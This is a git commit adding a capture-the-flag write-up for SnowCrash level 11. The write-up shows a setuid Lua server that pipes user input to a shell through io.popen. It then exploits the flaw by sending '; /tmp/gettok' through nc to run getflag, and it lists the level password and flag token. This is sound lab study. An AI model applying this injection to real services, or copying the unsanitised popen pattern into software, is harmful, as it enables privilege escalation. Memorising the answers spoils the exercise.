refactor(maiboyer): adding the maibaoyer directory

2026-01-28 03:51:08 +01:00 · 2026-01-28 03:51:08 +01:00 · ab55d4de10
commit ab55d4de10
parent db7f1343c5
48 changed files with 0 additions and 0 deletions
--- a/maiboyer/level11/README.md
+++ b/maiboyer/level11/README.md
@ -0,0 +1,86 @@
+# Level 11
+
+## how to login
+
+username: level11
+
+password: feulo4b72j7edeahuete3no7c
+
+## Goal
+
+run `getflag` as user `flag11`
+
+## Actually doing something
+
+
+```bash
+level11@SnowCrash:~$ ll
+total 16
+dr-xr-x---+ 1 level11 level11  120 Mar  5  2016 ./
+d--x--x--x  1 root    users    340 Aug 30  2015 ../
+-r-x------  1 level11 level11  220 Apr  3  2012 .bash_logout*
+-r-x------  1 level11 level11 3518 Aug 30  2015 .bashrc*
+-rwsr-sr-x  1 flag11  level11  668 Mar  5  2016 level11.lua*
+-r-x------  1 level11 level11  675 Apr  3  2012 .profile*
+```
+
+a setuid script ? something seems fishy, lets open it
+
+```lua
+#!/usr/bin/env lua
+local socket = require("socket")
+local server = assert(socket.bind("127.0.0.1", 5151))
+
+function hash(pass)
+  prog = io.popen("echo "..pass.." | sha1sum", "r")
+  data = prog:read("*all")
+  prog:close()
+
+  data = string.sub(data, 1, 40)
+
+  return data
+end
+
+
+while 1 do
+  local client = server:accept()
+  client:send("Password: ")
+  client:settimeout(60)
+  local l, err = client:receive()
+  if not err then
+      print("trying " .. l)
+      local h = hash(l)
+
+      if h ~= "f05d1d066fb246efe0c6f7d095f909a7a0cf34a0" then
+          client:send("Erf nope..\n");
+      else
+          client:send("Gz you dumb*\n")
+      end
+
+  end
+
+  client:close()
+end
+```
+
+it seems to be a server that ask for a password, check that the password is correct and does something ?
+
+Lookit at the `hash` function, we do see a nice little shell injection oportunity, lets try something :D
+
+we want to have something that write the getflag somewhere like we did before.
+
+what about the same script:
+```bash
+level11@SnowCrash:~$ cat <<EOF >/tmp/gettok
+#!/bin/sh
+getflag >/tmp/flag
+chmod 777 /tmp/flag
+EOF
+level11@SnowCrash:~$ chmod +x /tmp/gettok
+level11@SnowCrash:~$ echo "; /tmp/gettok" | nc localhost 5151
+Password: Erf nope..
+level11@SnowCrash:~$ cat /tmp/flag
+Check flag.Here is your token : fa6v5ateaw21peobuub8ipe6s
+```
+
+and voila :D